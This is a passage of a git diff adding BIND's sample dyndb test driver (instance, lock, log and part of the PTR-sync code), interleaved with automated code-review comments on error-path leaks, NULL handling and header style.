+ */ + if (dctx->memdebug != &isc_mem_debugging) { + isc_lib_register(); + isc_log_setcontext(dctx->lctx); + dns_log_setcontext(dctx->lctx); + isc_hash_set_initializer(dctx->hashinit); + isc_mem_debugging = *(unsigned int *)dctx->memdebug; + } + + s = isc_mem_strdup(mctx, parameters); + + result = isc_commandline_strtoargv(mctx, s, &argc, &argv, 0); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "dyndb_init: isc_commandline_strtoargv -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + + log_write(ISC_LOG_DEBUG(9), "loading params for dyndb '%s' from %s:%lu", + name, file, line); + + /* Finally, create the instance. */ + result = new_sample_instance(mctx, name, argc, argv, dctx, + &sample_inst); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "dyndb_init: new_sample_instance -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + + /* + * This is an example so we create and load zones + * right now. This step can be arbitrarily postponed. + */ + result = load_sample_instance_zones(sample_inst); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "dyndb_init: load_sample_instance_zones -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + + *instp = sample_inst; + +cleanup: + isc_mem_free(mctx, s); + if (argv != NULL) { + isc_mem_put(mctx, argv, argc * sizeof(*argv)); + } + + return (result); +} + +/* + * Driver destroy is called for every instance on every reload and then once + * during shutdown. + * + * @param[out] instp Pointer to instance-specific data (for one dyndb section). + */ +void +dyndb_destroy(void **instp) { + destroy_sample_instance((sample_instance_t **)instp); +} + +/* + * Driver version is called when loading the driver to ensure there + * is no API mismatch between the driver and the caller. + */ +int +dyndb_version(unsigned int *flags) { + UNUSED(flags); + + return (DNS_DYNDB_VERSION); +} 
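Review bot: In `dyndb_init`, the `goto cleanup` taken when `load_sample_instance_zones()` fails leaves `sample_inst` allocated and never stored in `*instp`, so the instance built by `new_sample_instance()`, including its `dns_db_register()` registration, is not released on that path. The cleanup label frees only `s` and `argv`. Because `destroy_sample_instance()` returns early for a NULL instance, the cleanup block can add `if (result != ISC_R_SUCCESS) { destroy_sample_instance(&sample_inst); }`. A `REQUIRE(instp != NULL && *instp == NULL);` next to the existing `name` and `dctx` checks would also state the output contract that the final `*instp = sample_inst;` relies on.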
diff --git a/bin/tests/system/dyndb/driver/instance.c b/bin/tests/system/dyndb/driver/instance.c new file mode 100644 index 0000000..9e90a2c --- /dev/null +++ b/bin/tests/system/dyndb/driver/instance.c 
@@ -0,0 +1,231 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) 2009-2015 Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +/* + * Driver instance object. + * + * One instance is equivalent to dynamic-db section in named.conf. + * This module parses arguments and provide high-level operations + * instance init/zone load/instance destroy. + */ + +#include "instance.h" + +#include <isc/task.h> +#include <isc/util.h> + +#include <dns/db.h> +#include <dns/dyndb.h> +#include <dns/fixedname.h> +#include <dns/name.h> +#include <dns/view.h> +#include <dns/zone.h> + +#include "db.h" +#include "log.h" +#include "util.h" +#include "zone.h" + +/* + * Parse parameters and convert them to zone names. Caller has to deallocate + * resulting DNS names. + * + * @param[in] argv NULL-terminated string array of length 2 (excluding NULL) + * Each string has to be a valid DNS name. 
+ * @param[out] z1 Zone name from argv[0] + * @param[out] z2 Zone name from argv[1] + */ +static isc_result_t +parse_params(isc_mem_t *mctx, int argc, char **argv, dns_name_t *z1, + dns_name_t *z2) { + isc_result_t result; + int i; + + REQUIRE(argv != NULL); + REQUIRE(z1 != NULL); + REQUIRE(z2 != NULL); + + for (i = 0; i < argc; i++) { + log_info("param: '%s'", argv[i]); + } + log_info("number of params: %d", i); + + if (argc != 2) { + log_error("exactly two parameters " + "(absolute zone names) are required"); + result = ISC_R_FAILURE; + goto cleanup; + } + result = dns_name_fromstring2(z1, argv[0], dns_rootname, 0, mctx); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "parse_params: dns_name_fromstring2 -> %s", + isc_result_totext(result)); + goto cleanup; + } + result = dns_name_fromstring2(z2, argv[1], dns_rootname, 0, mctx); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "parse_params: dns_name_fromstring2 -> %s", + isc_result_totext(result)); + goto cleanup; + } + + result = ISC_R_SUCCESS; + +cleanup: + return (result); +} + +/* + * Initialize new driver instance. It will not create zones until + * load_sample_instance_zones() is called. 
+ */ +isc_result_t +new_sample_instance(isc_mem_t *mctx, const char *db_name, int argc, char **argv, + const dns_dyndbctx_t *dctx, + sample_instance_t **sample_instp) { + isc_result_t result; + sample_instance_t *inst = NULL; + + REQUIRE(sample_instp != NULL && *sample_instp == NULL); + + CHECKED_MEM_GET_PTR(mctx, inst); + ZERO_PTR(inst); + isc_mem_attach(mctx, &inst->mctx); + + inst->db_name = isc_mem_strdup(mctx, db_name); + + inst->zone1_name = dns_fixedname_initname(&inst->zone1_fn); + inst->zone2_name = dns_fixedname_initname(&inst->zone2_fn); + + result = parse_params(mctx, argc, argv, inst->zone1_name, + inst->zone2_name); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "new_sample_instance: parse_params -> %s", + isc_result_totext(result)); + goto cleanup; + } + + dns_view_attach(dctx->view, &inst->view); + dns_zonemgr_attach(dctx->zmgr, &inst->zmgr); + isc_task_attach(dctx->task, &inst->task); + + /* Register new DNS DB implementation. */ + result = dns_db_register(db_name, create_db, inst, mctx, &inst->db_imp); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "new_sample_instance: dns_db_register -> %s", + isc_result_totext(result)); + goto cleanup; + } + + *sample_instp = inst; + result = ISC_R_SUCCESS; + +cleanup: + if (result != ISC_R_SUCCESS) { + destroy_sample_instance(&inst); + } + return (result); +} + +/* + * Create empty zones, add fake SOA, NS, and A records, load fake zones + * and add them to inst->view. 
+ */ +isc_result_t +load_sample_instance_zones(sample_instance_t *inst) { + isc_result_t result; + + result = create_zone(inst, inst->zone1_name, &inst->zone1); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "load_sample_instance_zones: create_zone -> %s", + isc_result_totext(result)); + goto cleanup; + } + result = activate_zone(inst, inst->zone1); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "load_sample_instance_zones: activate_zone -> %s", + isc_result_totext(result)); + goto cleanup; + } + + result = create_zone(inst, inst->zone2_name, &inst->zone2); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "load_sample_instance_zones: create_zone -> %s", + isc_result_totext(result)); + goto cleanup; + } + result = activate_zone(inst, inst->zone2); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "load_sample_instance_zones: activate_zone -> %s", + isc_result_totext(result)); + goto cleanup; + } + +cleanup: + return (result); +} + +void +destroy_sample_instance(sample_instance_t **instp) { + sample_instance_t *inst; + REQUIRE(instp != NULL); + + inst = *instp; + *instp = NULL; + if (inst == NULL) { + return; + } + + if (inst->db_name != NULL) { + isc_mem_free(inst->mctx, inst->db_name); + } + if (inst->zone1 != NULL) { + dns_zone_detach(&inst->zone1); + } + if (inst->zone2 != NULL) { + dns_zone_detach(&inst->zone2); + } + if (inst->db_imp != NULL) { + dns_db_unregister(&inst->db_imp); + } + + dns_view_detach(&inst->view); + dns_zonemgr_detach(&inst->zmgr); + isc_task_detach(&inst->task); + + MEM_PUT_AND_DETACH(inst); +} diff --git a/bin/tests/system/dyndb/driver/instance.h b/bin/tests/system/dyndb/driver/instance.h new file mode 100644 index 0000000..ad34573 --- /dev/null +++ b/bin/tests/system/dyndb/driver/instance.h 
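Review bot: `destroy_sample_instance()` calls `dns_view_detach()`, `dns_zonemgr_detach()` and `isc_task_detach()` unconditionally, but `new_sample_instance()` reaches it through its cleanup label before those three attaches when `parse_params()` fails, so the pointers are still NULL from `ZERO_PTR(inst)`. If the detach functions assert on a NULL object (their bodies are not visible in this hunk), a wrong parameter count in named.conf would abort the server instead of returning `ISC_R_FAILURE`. The `zone1`, `zone2` and `db_imp` members are already guarded; the remaining three need the same guard, as below.

```c
	/* … unchanged: db_name, zone1, zone2 and db_imp release … */

	/* view, zmgr and task are still NULL if parse_params() failed */
	if (inst->view != NULL) {
		dns_view_detach(&inst->view);
	}
	if (inst->zmgr != NULL) {
		dns_zonemgr_detach(&inst->zmgr);
	}
	if (inst->task != NULL) {
		isc_task_detach(&inst->task);
	}

	MEM_PUT_AND_DETACH(inst);
```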
@@ -0,0 +1,76 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) 2009-2015 Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +/** + * Driver instance object. + */ + +#ifndef _LD_INSTANCE_H_ +#define _LD_INSTANCE_H_ + +#include <stdbool.h> + +#include <dns/fixedname.h> +#include <dns/name.h> +#include <dns/types.h> + +struct sample_instance { + isc_mem_t *mctx; + char *db_name; + dns_dbimplementation_t *db_imp; + + /* These are needed for zone creation. 
*/ + dns_view_t *view; + dns_zonemgr_t *zmgr; + isc_task_t *task; + bool exiting; + + dns_zone_t *zone1; + dns_fixedname_t zone1_fn; + dns_name_t *zone1_name; + + dns_zone_t *zone2; + dns_fixedname_t zone2_fn; + dns_name_t *zone2_name; +}; + +typedef struct sample_instance sample_instance_t; + +isc_result_t +new_sample_instance(isc_mem_t *mctx, const char *db_name, int argc, char **argv, + const dns_dyndbctx_t *dctx, + sample_instance_t **sample_instp); + +isc_result_t +load_sample_instance_zones(sample_instance_t *inst); + +void +destroy_sample_instance(sample_instance_t **sample_instp); + +#endif /* !_LD_INSTANCE_H_ */ diff --git a/bin/tests/system/dyndb/driver/lock.c b/bin/tests/system/dyndb/driver/lock.c new file mode 100644 index 0000000..5d73871 --- /dev/null +++ b/bin/tests/system/dyndb/driver/lock.c 
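Review bot: The include guard `_LD_INSTANCE_H_` starts with an underscore followed by an upper-case letter, a form C reserves for the implementation. log.h in this commit does the same with `_LD_LOG_H_`, while db.h uses `#pragma once` and lock.h uses `LOCK_H_`. Settling on one form for the driver, for example `#pragma once` as in db.h, removes the reserved names and the inconsistency. The `exiting` member has no comment and is not referenced in the code visible here, so a one-line comment saying who sets it and who reads it would help a reader of this example driver.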
@@ -0,0 +1,81 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +#include "lock.h" + +#include <isc/task.h> +#include <isc/util.h> + +/* + * Lock BIND dispatcher and allow only single task to run. + * + * @warning + * All calls to isc_task_beginexclusive() have to operate on the same task + * otherwise it would not be possible to distinguish recursive locking + * from real conflict on the dispatcher lock. + * For this reason this wrapper function always works with inst->task. + * As a result, this function have to be be called only from inst->task. + * + * Recursive locking is allowed. Auxiliary variable pointed to by "statep" + * stores information if last run_exclusive_enter() operation really locked + * something or if the lock was called recursively and was no-op. 
+ * + * The pair (inst, state) used for run_exclusive_enter() has to be + * used for run_exclusive_exit(). + * + * @param[in] inst The instance with the only task which is allowed to + * run. + * @param[in,out] statep Lock state: ISC_R_SUCCESS or ISC_R_LOCKBUSY + */ +void +run_exclusive_enter(sample_instance_t *inst, isc_result_t *statep) { + REQUIRE(statep != NULL); + REQUIRE(*statep == ISC_R_IGNORE); + + *statep = isc_task_beginexclusive(inst->task); + RUNTIME_CHECK(*statep == ISC_R_SUCCESS || *statep == ISC_R_LOCKBUSY); +} + +/* + * Exit task-exclusive mode. + * + * @param[in] inst The instance used for previous run_exclusive_enter() call. + * @param[in] state Lock state as returned by run_exclusive_enter(). + */ +void +run_exclusive_exit(sample_instance_t *inst, isc_result_t state) { + if (state == ISC_R_SUCCESS) { + isc_task_endexclusive(inst->task); + } else { + /* Unlocking recursive lock or the lock was never locked. */ + INSIST(state == ISC_R_LOCKBUSY || state == ISC_R_IGNORE); + } + + return; +} diff --git a/bin/tests/system/dyndb/driver/lock.h b/bin/tests/system/dyndb/driver/lock.h new file mode 100644 index 0000000..8cf5907 --- /dev/null +++ b/bin/tests/system/dyndb/driver/lock.h 
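Review bot: The comment on `run_exclusive_enter` describes `statep` only by its result values ("ISC_R_SUCCESS or ISC_R_LOCKBUSY"), while the function asserts `*statep == ISC_R_IGNORE` on entry. I would change the parameter line to `@param[in,out] statep Must be ISC_R_IGNORE on entry; set to ISC_R_SUCCESS or ISC_R_LOCKBUSY on return.` so callers know how to initialise it. `inst` is dereferenced in both functions without a `REQUIRE(inst != NULL);`, unlike `statep`. The warning text also has a doubled word ("have to be be called").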
@@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +#ifndef LOCK_H_ +#define LOCK_H_ + +#include "instance.h" +#include "util.h" + +void +run_exclusive_enter(sample_instance_t *inst, isc_result_t *statep); + +void +run_exclusive_exit(sample_instance_t *inst, isc_result_t state); + +#endif /* LOCK_H_ */ diff --git a/bin/tests/system/dyndb/driver/log.c b/bin/tests/system/dyndb/driver/log.c new file mode 100644 index 0000000..ef8b1ee --- /dev/null +++ b/bin/tests/system/dyndb/driver/log.c 
@@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +#include "log.h" + +#include <isc/util.h> + +#include <dns/log.h> + +void +log_write(int level, const char *format, ...) { + va_list args; + + va_start(args, format); + isc_log_vwrite(dns_lctx, DNS_LOGCATEGORY_DATABASE, DNS_LOGMODULE_DYNDB, + level, format, args); + va_end(args); +} diff --git a/bin/tests/system/dyndb/driver/log.h b/bin/tests/system/dyndb/driver/log.h new file mode 100644 index 0000000..f612a8b --- /dev/null +++ b/bin/tests/system/dyndb/driver/log.h 
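Review bot: `log_write` uses `va_list`, `va_start` and `va_end`, but log.c includes only log.h, `<isc/util.h>` and `<dns/log.h>`, so the declarations arrive only through whatever those headers happen to include. Adding `#include <stdarg.h>` at the top of the system includes makes the file self-contained.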
@@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH + * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY + * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, + * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM + * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR + * PERFORMANCE OF THIS SOFTWARE. + */ + +#ifndef _LD_LOG_H_ +#define _LD_LOG_H_ + +#include <isc/error.h> + +#include <dns/log.h> +#include <dns/result.h> + +#define fatal_error(...) isc_error_fatal(__FILE__, __LINE__, __VA_ARGS__) + +#define log_error_r(fmt, ...) \ + log_error(fmt ": %s", ##__VA_ARGS__, dns_result_totext(result)) + +#define log_error(format, ...) log_write(ISC_LOG_ERROR, format, ##__VA_ARGS__) + +#define log_info(format, ...) log_write(ISC_LOG_INFO, format, ##__VA_ARGS__) + +void +log_write(int level, const char *format, ...) ISC_FORMAT_PRINTF(2, 3); + +#endif /* !_LD_LOG_H_ */ diff --git a/bin/tests/system/dyndb/driver/syncptr.c b/bin/tests/system/dyndb/driver/syncptr.c new file mode 100644 index 0000000..cfed153 --- /dev/null +++ b/bin/tests/system/dyndb/driver/syncptr.c 
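Review bot: `log_error_r` expands to a use of a variable named `result` that must exist in the caller's scope, and nothing at the macro says so. A comment above it such as `/* log_error_r() appends dns_result_totext(result); the caller must have 'result' in scope */` would document that dependency. The three logging macros also rely on `##__VA_ARGS__`, which is a compiler extension rather than standard C and is worth a note if this driver is meant as a portable example.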
@@ -0,0 +1,337 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0 AND ISC
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Copyright (C) Red Hat
+ *
+ * Permission to use, copy, modify, and/or distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND AUTHORS DISCLAIMS ALL WARRANTIES WITH
+ * REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
+ * AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT,
+ * INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
+ * LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
+ * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
+ * PERFORMANCE OF THIS SOFTWARE.
+ */
+
+/*
+ * Automatic A/AAAA/PTR record synchronization.
+ */
+
+#include "syncptr.h"
+
+#include <isc/event.h>
+#include <isc/eventclass.h>
+#include <isc/netaddr.h>
+#include <isc/task.h>
+#include <isc/util.h>
+
+#include <dns/byaddr.h>
+#include <dns/db.h>
+#include <dns/name.h>
+#include <dns/view.h>
+#include <dns/zone.h>
+
+#include "instance.h"
+#include "util.h"
+
+/* Almost random value. See eventclass.h */
+#define SYNCPTR_WRITE_EVENT (ISC_EVENTCLASS(1025) + 1)
+
+/*
+ * Event used for making changes to reverse zones.
+ */
+typedef struct syncptrevent syncptrevent_t;
+struct syncptrevent {
+ ISC_EVENT_COMMON(syncptrevent_t);
+ isc_mem_t *mctx;
+ dns_zone_t *zone;
+ dns_diff_t diff;
+ dns_fixedname_t ptr_target_name; /* referenced by owner name in
+ * tuple */
+ isc_buffer_t b; /* referenced by target name in tuple */
+ unsigned char buf[DNS_NAME_MAXWIRE];
+};
+
+/*
+ * Write diff generated in syncptr() to reverse zone.
+ *
+ * This function will be called asynchronously and syncptr() will not get
+ * any result from it.
+ *
+ */
+static void
+syncptr_write(isc_task_t *task, isc_event_t *event) {
+ syncptrevent_t *pevent = (syncptrevent_t *)event;
+ dns_dbversion_t *version = NULL;
+ dns_db_t *db = NULL;
+ isc_result_t result;
+
+ REQUIRE(event->ev_type == SYNCPTR_WRITE_EVENT);
+
+ UNUSED(task);
+
+ log_write(ISC_LOG_INFO, "ENTER: syncptr_write");
+
+ result = dns_zone_getdb(pevent->zone, &db);
+ if (result != ISC_R_SUCCESS) {
+ log_write(ISC_LOG_ERROR,
+ "syncptr_write: dns_zone_getdb -> %s\n",
+ isc_result_totext(result));
+ goto cleanup;
+ }
+
+ result = dns_db_newversion(db, &version);
+ if (result != ISC_R_SUCCESS) {
+ log_write(ISC_LOG_ERROR,
+ "syncptr_write: dns_db_newversion -> %s\n",
+ isc_result_totext(result));
+ goto cleanup;
+ }
+ result = dns_diff_apply(&pevent->diff, db, version);
+ if (result != ISC_R_SUCCESS) {
+ log_write(ISC_LOG_ERROR,
+ "syncptr_write: dns_diff_apply -> %s\n",
+ isc_result_totext(result));
+ goto cleanup;
+ }
+
+cleanup:
+ if (db != NULL) {
+ if (version != NULL) {
+ dns_db_closeversion(db, &version, true);
+ }
+ dns_db_detach(&db);
+ }
+ dns_zone_detach(&pevent->zone);
+ dns_diff_clear(&pevent->diff);
+ isc_event_free(&event);
+}
+
+/*
+ * Find a reverse zone for given IP address.
+ *
+ * @param[in] rdata IP address as A/AAAA record
+ * @param[out] name Owner name for the PTR record
+ * @param[out] zone DNS zone for reverse record matching the IP address
+ *
+ * @retval ISC_R_SUCCESS DNS name derived from given IP address belongs to an
+ * reverse zone managed by this driver instance.
+ * PTR record synchronization can continue.
+ * @retval ISC_R_NOTFOUND Suitable reverse zone was not found because it
+ * does not exist or is not managed by this driver.
+ */
+static isc_result_t
+syncptr_find_zone(sample_instance_t *inst, dns_rdata_t *rdata, dns_name_t *name,
+ dns_zone_t **zone) {
+ isc_result_t result;
+ isc_netaddr_t isc_ip; /* internal net address representation */
+ dns_rdata_in_a_t ipv4;
+ dns_rdata_in_aaaa_t ipv6;
+
+ REQUIRE(inst != NULL);
+ REQUIRE(zone != NULL && *zone == NULL);
+
+ switch (rdata->type) {
+ case dns_rdatatype_a:
+ CHECK(dns_rdata_tostruct(rdata, &ipv4, inst->mctx));
+ isc_netaddr_fromin(&isc_ip, &ipv4.in_addr);
+ break;
+
+ case dns_rdatatype_aaaa:
+ CHECK(dns_rdata_tostruct(rdata, &ipv6, inst->mctx));
+ isc_netaddr_fromin6(&isc_ip, &ipv6.in6_addr);
+ break;
+
+ default:
+ fatal_error("unsupported address type 0x%x", rdata->type);
+ break;
+ }
+
+ /*
+ * Convert IP address to PTR owner name.
+ *
+ * @example
+ * 192.168.0.1 -> 1.0.168.192.in-addr.arpa
+ */
+ result = dns_byaddr_createptrname(&isc_ip, 0, name);
+ if (result != ISC_R_SUCCESS) {
+ log_write(ISC_LOG_ERROR,
+ "syncptr_find_zone: dns_byaddr_createptrname -> %s\n",
+ isc_result_totext(result));
+ goto cleanup;
+ }
+
+ /* Find a zone containing owner name of the PTR record. */
+ result = dns_zt_find(inst->view->zonetable, name, 0, NULL, zone);
+ if (result == DNS_R_PARTIALMATCH) {
+ result = ISC_R_SUCCESS;
+ } else if (result != ISC_R_SUCCESS) {
+ log_write(ISC_LOG_ERROR,
+ "syncptr_find_zone: dns_zt_find -> %s\n",
+ isc_result_totext(result));
+ goto cleanup;
+ }
+
+ /* Make sure that the zone is managed by this driver. */
+ if (*zone != inst->zone1 && *zone != inst->zone2) {
+ dns_zone_detach(zone);
+ log_write(ISC_LOG_INFO, "syncptr_find_zone: zone not managed");
+ result = ISC_R_NOTFOUND;
+ }
+
+cleanup:
+ if (rdata->type == dns_rdatatype_a) {
+ dns_rdata_freestruct(&ipv4);
+ } else {
+ dns_rdata_freestruct(&ipv6);
+ }
+
+ return (result);
+}
+
+/*
+ * Generate update event for PTR record to reflect change in A/AAAA record.
+ *
+ * @pre Reverse zone is managed by this driver.
+ *
+ * @param[in] a_name DNS domain of modified A/AAAA record
+ * @param[in] af Address family
+ * @param[in] ip_str IP address as a string (IPv4 or IPv6)
+ * @param[in] mod_op LDAP_MOD_DELETE if A/AAAA record is being deleted
+ * or LDAP_MOD_ADD if A/AAAA record is being added.
+ *
+ * @retval ISC_R_SUCCESS Event for PTR record update was generated and send.
+ * Change to reverse zone will be done asynchronously.
+ * @retval other Synchronization failed - reverse doesn't exist,
+ * is not managed by this driver instance,
+ * memory allocation error, etc.
+ */
+static isc_result_t
+syncptr(sample_instance_t *inst, dns_name_t *name, dns_rdata_t *addr_rdata,
+ dns_ttl_t ttl, dns_diffop_t op) {
+ isc_result_t result;
+ isc_mem_t *mctx = inst->mctx;
+ dns_fixedname_t ptr_name;
+ dns_zone_t *ptr_zone = NULL;
+ dns_rdata_ptr_t ptr_struct;
+ dns_rdata_t ptr_rdata = DNS_RDATA_INIT;
+ dns_difftuple_t *tp = NULL;
+ isc_task_t *task = NULL;
+ syncptrevent_t *pevent = NULL;
+
+ dns_fixedname_init(&ptr_name);
+ DNS_RDATACOMMON_INIT(&ptr_struct, dns_rdatatype_ptr, dns_rdataclass_in);
+ dns_name_init(&ptr_struct.ptr, NULL);
+
+ pevent = (syncptrevent_t *)isc_event_allocate(
+ inst->mctx, inst, SYNCPTR_WRITE_EVENT, syncptr_write, NULL,
+ sizeof(syncptrevent_t));
